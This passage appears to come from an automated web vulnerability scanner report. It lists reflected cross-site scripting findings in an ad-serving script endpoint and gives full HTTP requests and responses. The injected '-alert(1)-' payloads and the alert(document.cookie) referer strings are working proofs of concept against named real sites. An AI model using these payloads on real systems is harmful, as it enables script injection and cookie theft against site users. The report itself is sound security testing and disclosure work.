User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:49:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:49:06 GMT; path=/
Set-Cookie: i_1=33:1411:836:100:0:38345:1296398946:L|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2; expires=Tue, 01-Mar-2011 14:49:06 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 939

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!e9d3d'-alert(1)-'889a7271f4a&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return
...[SNIP]...

5.73. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426** [AN parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426**

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f695'-alert(1)-'979cf30b28 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balertdocument.cookie_@2F_@2F2badde9cef5?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=11105081375f695'-alert(1)-'979cf30b28&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:50:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:50:15 GMT; path=/
Set-Cookie: i_1=33:1411:782:100:0:38345:1296399015:L|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2; expires=Tue, 01-Mar-2011 14:50:15 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 938

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=11105081375f695'-alert(1)-'979cf30b28&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       document.writ
...[SNIP]...

5.74. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426** [ASID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426**

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 34465'-alert(1)-'c4dc97752cd was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balertdocument.cookie_@2F_@2F2badde9cef5?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a34465'-alert(1)-'c4dc97752cd HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:50:33 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:50:33 GMT; path=/
Set-Cookie: i_1=33:1411:46:100:0:38345:1296399033:L|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2; expires=Tue, 01-Mar-2011 14:50:33 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 935

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a34465'-alert(1)-'c4dc97752cd';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7f
...[SNIP]...

5.75. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426** [PG parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426**

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 767be'-alert(1)-'2fd933b06e7 was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balertdocument.cookie_@2F_@2F2badde9cef5?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD767be'-alert(1)-'2fd933b06e7&ASID=de8164d050b942d8a816e5fd11a9275a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:50:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:50:24 GMT; path=/
Set-Cookie: i_1=33:1411:46:100:0:38345:1296399024:L|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2; expires=Tue, 01-Mar-2011 14:50:24 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 935

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD767be'-alert(1)-'2fd933b06e7&ASID=de8164d050b942d8a816e5fd11a9275a';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       document.write('<a href
...[SNIP]...

5.76. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426** [TargetID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426**

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e395'-alert(1)-'48483e8fdb0 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balertdocument.cookie_@2F_@2F2badde9cef5?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=82312089e395'-alert(1)-'48483e8fdb0&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:50:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:50:07 GMT; path=/
Set-Cookie: i_1=33:1411:49:100:0:38345:1296399007:L|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2; expires=Tue, 01-Mar-2011 14:50:07 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 941

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=82312089e395'-alert(1)-'48483e8fdb0&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
   
...[SNIP]...

5.77. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426** [UIT parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426**

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 62a7d'-alert(1)-'51e6f106d3a was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balertdocument.cookie_@2F_@2F2badde9cef5?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G62a7d'-alert(1)-'51e6f106d3a&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:49:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:49:52 GMT; path=/
Set-Cookie: i_1=33:1411:972:100:0:38345:1296398992:L|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2; expires=Tue, 01-Mar-2011 14:49:52 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 931

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G62a7d'-alert(1)-'51e6f106d3a&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function
...[SNIP]...

5.78. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426** [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426**

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d4b3'-alert(1)-'9d3d9a4f116 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balertdocument.cookie_@2F_@2F2badde9cef5?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a&9d4b3'-alert(1)-'9d3d9a4f116=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:51:23 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:51:23 GMT; path=/
Set-Cookie: i_1=33:1411:49:100:0:38345:1296399083:L|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2; expires=Tue, 01-Mar-2011 14:51:23 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 944

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a&9d4b3'-alert(1)-'9d3d9a4f116=1';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d
...[SNIP]...

5.79. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449** [&PID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449**

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d98da'-alert(1)-'8363eeee3cc was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balert1_@2F_@2F2badde9cef5?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235d98da'-alert(1)-'8363eeee3cc&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:49:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:49:20 GMT; path=/
Set-Cookie: i_1=33:1411:992:100:0:38345:1296398960:L|33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2; expires=Tue, 01-Mar-2011 14:49:20 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 913

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235d98da'-alert(1)-'8363eeee3cc&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       fu
...[SNIP]...

5.80. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449** [10,1,103;1920;1200;http%3A_@2F_@2Fredacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balert1_@2F_@2F2badde9cef5?click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449**

Issue detail

The value of the 10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balert1_@2F_@2F2badde9cef5?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac4e4'-alert(1)-'5a9940a3aa6 was submitted in the 10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balert1_@2F_@2F2badde9cef5?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balert1_@2F_@2F2badde9cef5?click=http://g.redacted/_2AD0003L/97000000000044962.1?!ac4e4'-alert(1)-'5a9940a3aa6&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:49:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:49:06 GMT; path=/
Set-Cookie: i_1=33:1411:49:100:0:38345:1296398946:L|33:1411:972:100:0:34115:1296392427:B2|33:1391:835:95:0:34115:1296392421:B2; expires=Tue, 01-Mar-2011 14:49:06 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 927

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!ac4e4'-alert(1)-'5a9940a3aa6&&PID=8015235&UIT=G&TargetID=8231208&AN=1798982473&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return
...[SNIP]...

5.81. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449** [AN parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449**

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85db5'-alert(1)-'daab0c4241f was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balert1_@2F_@2F2badde9cef5?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=179898247385db5'-alert(1)-'daab0c4241f&PG=INV4QD&ASID=c0c03864f93b446ea43c1039d6665980 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
